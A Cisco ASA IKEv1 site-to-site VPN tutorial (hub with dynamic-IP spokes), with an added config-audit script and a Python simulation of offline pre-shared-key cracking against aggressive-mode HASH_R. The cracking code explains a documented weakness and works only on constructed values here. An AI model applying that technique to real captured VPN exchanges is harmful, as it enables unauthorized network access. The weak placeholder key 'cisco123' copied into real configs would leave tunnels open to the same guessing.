ASA IKEv1 Dynamic-to-Static S2S VPN

Topology: a central (hub) ASA with a static public IP (172.16.2.1) terminates tunnels from two remote ASAs that sit behind dynamic public IPs. Remote 1 uses main mode and therefore lands in the default tunnel-group (DefaultL2LGroup); Remote 2 uses aggressive mode with a key-id identity so the hub can match it to a named tunnel-group (SPOKE1). Protected networks: hub 10.1.2.0/24, Remote 1 10.1.1.0/24, Remote 2 10.1.3.0/24.


Central ASA
! Create objects
object network obj-10.1.2.0_24
 subnet 10.1.2.0 255.255.255.0
object network obj-10.1.1.0_24
 subnet 10.1.1.0 255.255.255.0
object network obj-10.1.3.0_24
 subnet 10.1.3.0 255.255.255.0

! NAT exemption (identity NAT) for the L2L VPN traffic, then dynamic PAT to the outside interface for Internet access.
nat (inside,outside) source static obj-10.1.2.0_24 obj-10.1.2.0_24 destination static obj-10.1.1.0_24 obj-10.1.1.0_24 no-proxy-arp route-lookup
nat (inside,outside) source static obj-10.1.2.0_24 obj-10.1.2.0_24 destination static obj-10.1.3.0_24 obj-10.1.3.0_24 no-proxy-arp route-lookup
!
object network obj-10.1.2.0_24
 nat (inside,outside) dynamic interface

! Define IKEv1 policy
crypto ikev1 policy 10
 authentication pre-share
 encryption aes-256
 hash sha
 group 2

! Enable ikev1 on outside interface 
crypto ikev1 enable outside

! Define transform-set
crypto ipsec ikev1 transform-set T-SET esp-aes-256 esp-sha-hmac

! Configure the dynamic map:
!   • A transform-set is required.
!   • (Optional) Reverse Route Injection (RRI) installs a static route for each spoke's protected network, taken from the negotiated proxy ID, pointing out the outside interface, so internal routers can learn it via redistribution. The dynamic keyword (available on newer ASA releases) ties the route's lifetime to the SA: it is installed when the tunnel comes up and removed when the SA goes down.
crypto dynamic-map outside_dyn_map 1 set ikev1 transform-set T-SET
crypto dynamic-map outside_dyn_map 1 set reverse-route dynamic

! Bind the dynamic map to crypto map
crypto map outside_map 65535 ipsec-isakmp dynamic outside_dyn_map

! Enable crypto map on outside interface
crypto map outside_map interface outside

! Solution 1: Remote 1 has a dynamic public IP and uses main mode. In main mode the hub must already know the PSK before it can decrypt the peer's ID, and with an unknown source address it cannot select a tunnel-group by IP, so the peer falls into DefaultL2LGroup. Every dynamic main-mode peer authenticates with this same key, so use a long random PSK (cisco123 is only a placeholder) and rotate it if any spoke is compromised.
tunnel-group DefaultL2LGroup ipsec-attributes
 ikev1 pre-shared-key cisco123

! Solution 2: Remote 2 also has a dynamic public IP, but sends a key-id (SPOKE1) as its ISAKMP identity in aggressive mode; create a tunnel-group named after that identity so it gets its own PSK.
tunnel-group SPOKE1 type ipsec-l2l
tunnel-group SPOKE1 ipsec-attributes
 ikev1 pre-shared-key cisco123
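The hub configuration above mixes settings a reviewer would accept (AES-256) with ones they would flag (DH group 2, an 8-character dictionary PSK reused on both tunnel-groups, and a PSK on DefaultL2LGroup that every dynamic main-mode peer shares). The following is an added example, not code from the original post or from Cisco: a small Python audit that reads ASA configuration text and reports those items. The embedded HUB_CONFIG is the page's own hub config trimmed to its crypto lines; the thresholds, the short COMMON_PSKS list and all function names are assumptions chosen for the example.

```python
"""Audit an ASA IKEv1 site-to-site configuration for weak settings.

Added example, not from the original post. It scans ASA configuration text
and reports what a reviewer would flag: small DH groups, weak ciphers and
hashes, aggressive mode, short or well-known pre-shared keys, PSK reuse
across tunnel-groups, and a PSK on DefaultL2LGroup (shared by every dynamic
main-mode peer). Sample input: the hub config from this page, crypto lines only.
"""

HUB_CONFIG = """\
crypto ikev1 policy 10
 authentication pre-share
 encryption aes-256
 hash sha
 group 2
crypto ikev1 enable outside
crypto ipsec ikev1 transform-set T-SET esp-aes-256 esp-sha-hmac
crypto dynamic-map outside_dyn_map 1 set ikev1 transform-set T-SET
crypto map outside_map 65535 ipsec-isakmp dynamic outside_dyn_map
crypto map outside_map interface outside
tunnel-group DefaultL2LGroup ipsec-attributes
 ikev1 pre-shared-key cisco123
tunnel-group SPOKE1 type ipsec-l2l
tunnel-group SPOKE1 ipsec-attributes
 ikev1 pre-shared-key cisco123
"""

WEAK_DH_GROUPS = {"1", "2", "5"}                 # 768/1024/1536-bit MODP
WEAK_P1_CIPHERS = {"des", "3des"}
WEAK_P1_HASHES = {"md5"}
WEAK_ESP = {"esp-null", "esp-des", "esp-3des", "esp-md5-hmac"}
COMMON_PSKS = {"cisco", "cisco123", "password", "secret"}   # tiny constructed list
MIN_PSK_LEN = 20                                            # assumed policy minimum


def audit_asa_config(text):
    """Return findings as (severity, where, message) tuples."""
    findings = []
    block = ""        # most recent top-level command; indented lines belong to it
    psks = {}         # psk -> tunnel-groups using it, to catch reuse
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw.startswith(" "):
            block = raw.strip()
        tok = raw.split()
        if block.startswith("crypto ikev1 policy") and len(tok) == 2:
            if tok[0] == "group" and tok[1] in WEAK_DH_GROUPS:
                findings.append(("high", block, f"DH group {tok[1]} is too small; use group 14 or higher where supported"))
            elif tok[0] == "encryption" and tok[1] in WEAK_P1_CIPHERS:
                findings.append(("high", block, f"weak phase 1 cipher {tok[1]}"))
            elif tok[0] == "hash" and tok[1] in WEAK_P1_HASHES:
                findings.append(("high", block, "MD5 as phase 1 hash"))
        elif tok[:4] == ["crypto", "ipsec", "ikev1", "transform-set"]:
            for t in tok[5:]:
                if t in WEAK_ESP:
                    findings.append(("high", f"transform-set {tok[4]}", f"weak IPsec transform {t}"))
        elif "phase1-mode aggressive" in raw:
            findings.append(("medium", block, "aggressive mode: IDs in the clear, PSK open to offline guessing"))
        elif tok[:2] == ["ikev1", "pre-shared-key"] and block.startswith("tunnel-group"):
            group, psk = block.split()[1], tok[2]
            if psk == "*****":
                # 'show run' masks keys; 'more system:running-config' shows them
                findings.append(("info", block, "PSK masked by 'show run'; audit 'more system:running-config'"))
                continue
            if len(psk) < MIN_PSK_LEN or psk.lower() in COMMON_PSKS:
                findings.append(("high", block, "weak pre-shared key"))
            psks.setdefault(psk, []).append(group)
            if group == "DefaultL2LGroup":
                findings.append(("medium", block, "PSK on DefaultL2LGroup is shared by every dynamic main-mode peer"))
    for psk, groups in psks.items():
        if len(groups) > 1:
            findings.append(("medium", ", ".join(groups), "same PSK reused across tunnel-groups"))
    return findings


if __name__ == "__main__":
    for sev, where, msg in audit_asa_config(HUB_CONFIG):
        print(f"[{sev}] {where}: {msg}")
```

Run it against the output of `more system:running-config` rather than `show running-config`, since the latter replaces pre-shared keys with `*****` and the key checks then degrade to the info finding.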

Remote 1 ASA

! Create objects:
object network obj-10.1.1.0_24
 subnet 10.1.1.0 255.255.255.0
object network obj-10.1.2.0_24
 subnet 10.1.2.0 255.255.255.0

! NAT exemption (identity NAT) for the L2L VPN traffic, then dynamic PAT to the outside interface for Internet access.
nat (inside,outside) source static obj-10.1.1.0_24 obj-10.1.1.0_24 destination static obj-10.1.2.0_24 obj-10.1.2.0_24 no-proxy-arp route-lookup
!
object network obj-10.1.1.0_24
 nat (inside,outside) dynamic interface

! Define ikev1 policy:
crypto ikev1 policy 10
 authentication pre-share
 encryption aes-256
 hash sha
 group 2

! Enable ikev1 on outside interface
crypto ikev1 enable outside

! Define transform-set
crypto ipsec ikev1 transform-set T-SET esp-aes-256 esp-sha-hmac

! Create VPN-ACL
access-list outside_cryptomap extended permit ip object obj-10.1.1.0_24 object obj-10.1.2.0_24

! Configure crypto map
crypto map outside_map 1 match address outside_cryptomap
crypto map outside_map 1 set peer 172.16.2.1
crypto map outside_map 1 set ikev1 transform-set T-SET

! Enable crypto map on outside interface
crypto map outside_map interface outside

! Create the tunnel-group, keyed by the hub's static public IP
tunnel-group 172.16.2.1 type ipsec-l2l
tunnel-group 172.16.2.1 ipsec-attributes
 ikev1 pre-shared-key cisco123


Remote 2 ASA

! Create objects:
object network obj-10.1.3.0_24
 subnet 10.1.3.0 255.255.255.0
object network obj-10.1.2.0_24
 subnet 10.1.2.0 255.255.255.0

! NAT exemption (identity NAT) for the L2L VPN traffic, then dynamic PAT to the outside interface for Internet access.
nat (inside,outside) source static obj-10.1.3.0_24 obj-10.1.3.0_24 destination static obj-10.1.2.0_24 obj-10.1.2.0_24 no-proxy-arp route-lookup
!
object network obj-10.1.3.0_24
 nat (inside,outside) dynamic interface

! Define ikev1 policy:
crypto ikev1 policy 10
 authentication pre-share
 encryption aes-256
 hash sha
 group 2

! Enable ikev1 on outside interface
crypto ikev1 enable outside

! Define transform-set
crypto ipsec ikev1 transform-set T-SET esp-aes-256 esp-sha-hmac

! Create VPN-ACL
access-list VPN-ACL extended permit ip object obj-10.1.3.0_24 object obj-10.1.2.0_24

! Configure a static crypto map. Aggressive mode carries the identity in message 1, which lets the hub select a non-default tunnel-group for a peer with a dynamic IP.
! Caveat: in aggressive mode the initiator and responder IDs pass in the clear, and the responder's authentication hash (HASH_R) is also sent unencrypted, so anyone who captures the exchange (or who sends a message 1 carrying the key-id) can test PSK guesses offline. Use a long, random PSK whenever aggressive mode is unavoidable.
crypto map MyMap 10 match address VPN-ACL
crypto map MyMap 10 set peer 172.16.2.1
crypto map MyMap 10 set ikev1 phase1-mode aggressive
crypto map MyMap 10 set ikev1 transform-set T-SET

! Set the ISAKMP identity to a key-id so the hub matches the named tunnel-group instead of DefaultL2LGroup (this is a global setting and applies to every IKEv1 peer of this ASA)
crypto isakmp identity key-id SPOKE1

! Enable crypto map on outside interface
crypto map MyMap interface outside

! Create the tunnel-group, keyed by the hub's static public IP
tunnel-group 172.16.2.1 type ipsec-l2l
tunnel-group 172.16.2.1 ipsec-attributes
 ikev1 pre-shared-key cisco123
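The aggressive-mode caveat in the Remote 2 section is worth seeing in code. Below is an added example, not part of the original post or any Cisco tool: a simulation of the values an observer sees in aggressive-mode messages 1 and 2 (cookies, nonces, DH public values, SA proposal, both IDs, and the responder's HASH_R), followed by the per-candidate HASH_R recomputation that turns a captured exchange into an offline PSK search. The hub side selects the PSK by the initiator's key-id exactly as the `crypto isakmp identity key-id SPOKE1` / `tunnel-group SPOKE1` pairing on this page does. The prf is HMAC-SHA1 to match `hash sha`; all wire bytes, HUB_TUNNEL_GROUPS, WORDLIST and the function names are constructed for the example.

```python
"""Offline PSK guessing against an IKEv1 aggressive-mode exchange (simulation).

Added example, not from the original post. In aggressive mode the responder's
HASH_R, both nonces, both DH public values, the cookies, the SA proposal and
both IDs travel unencrypted, so anyone holding that traffic (or anyone who
sent message 1 carrying the right key-id) can test candidate PSKs offline.
All wire values below are constructed random bytes; the prf is HMAC-SHA1 to
match 'hash sha' in the page's IKEv1 policy.
"""
import hashlib
import hmac
import os

ID_IPV4_ADDR = 1   # RFC 2407 ID types
ID_KEY_ID = 11


def prf(key, data):
    return hmac.new(key, data, hashlib.sha1).digest()


def id_body(id_type, data):
    """ID payload body: type(1) protocol(1) port(2) data; generic header excluded."""
    return bytes([id_type, 0, 0, 0]) + data


def skeyid_psk(psk, ni_b, nr_b):
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)   (RFC 2409 section 5.4)"""
    return prf(psk, ni_b + nr_b)


def hash_r(psk, ex):
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)"""
    skeyid = skeyid_psk(psk, ex["ni"], ex["nr"])
    return prf(skeyid, ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"]
               + ex["sai_b"] + ex["idir_b"])


# Hub side: the tunnel-group, and hence the PSK, is chosen by the initiator's
# key-id, which is what 'crypto isakmp identity key-id SPOKE1' sends.
HUB_TUNNEL_GROUPS = {b"SPOKE1": b"cisco123"}   # PSK from the page; constructed mapping


def hub_respond(ex, tunnel_groups):
    """Responder picks the PSK by the initiator's key-id and returns HASH_R."""
    key_id = ex["idii_b"][4:]
    return hash_r(tunnel_groups[key_id], ex)


def capture_exchange(initiator_key_id, tunnel_groups):
    """Fields an observer sees in aggressive-mode messages 1 and 2 (constructed)."""
    ex = {
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),
        "ni": os.urandom(20), "nr": os.urandom(20),
        "gxi": os.urandom(128), "gxr": os.urandom(128),  # group 2: 1024-bit values
        "sai_b": os.urandom(52),                           # SA payload body
        "idii_b": id_body(ID_KEY_ID, initiator_key_id),
        "idir_b": id_body(ID_IPV4_ADDR, bytes([172, 16, 2, 1])),  # hub address
    }
    ex["hash_r"] = hub_respond(ex, tunnel_groups)   # sent in the clear in message 2
    return ex


def crack_psk(ex, candidates):
    """Return the first candidate whose recomputed HASH_R matches the capture."""
    for cand in candidates:
        if hmac.compare_digest(hash_r(cand, ex), ex["hash_r"]):
            return cand
    return None


WORDLIST = [b"cisco", b"password", b"Cisco123", b"cisco123"]   # constructed


if __name__ == "__main__":
    ex = capture_exchange(b"SPOKE1", HUB_TUNNEL_GROUPS)
    print("recovered PSK:", crack_psk(ex, WORDLIST))
    strong = {b"SPOKE1": os.urandom(32)}
    print("strong PSK recovered:", crack_psk(capture_exchange(b"SPOKE1", strong), WORDLIST))
```

The search cost is one HMAC-SHA1 per candidate, which is why a dictionary PSK such as cisco123 falls immediately while a 32-byte random key never appears in any list. Note also that the attacker needs no traffic capture when the key-id is guessable: sending message 1 with that ID is enough to obtain HASH_R from the hub.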


=============================
Reference:
https://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/119007-config-asa9x-ike-ipsec-00.html
